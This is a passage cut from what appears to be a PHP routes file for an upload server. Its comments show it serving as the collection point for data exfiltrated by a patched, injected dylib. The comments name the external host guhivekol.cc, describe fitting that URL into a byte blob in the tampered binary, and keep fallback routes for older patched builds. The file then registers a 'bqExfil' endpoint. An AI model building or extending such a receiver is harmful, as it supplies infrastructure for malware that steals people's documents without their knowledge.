where('id', '[^/]+'); Route::match(['PUT', 'POST'], '/api/v1/uploads/{id}/chunks/{n}', [$ctl, 'uploadChunk']) ->where(['id' => '[^/]+', 'n' => '[0-9]+']); Route::post('/api/v1/finish', [$ctl, 'finish']); // inject_demo BQ documents exfil — multipart POST. // Patched dylib POSTs to /bq (https://guhivekol.cc/bq, 23-char URL // fits the 27-byte __bqurl blob). Keep / and /api/v1/bq as fallbacks // for unpatched/older patched builds. Route::post('/bq', [$ctl, 'bqExfil']);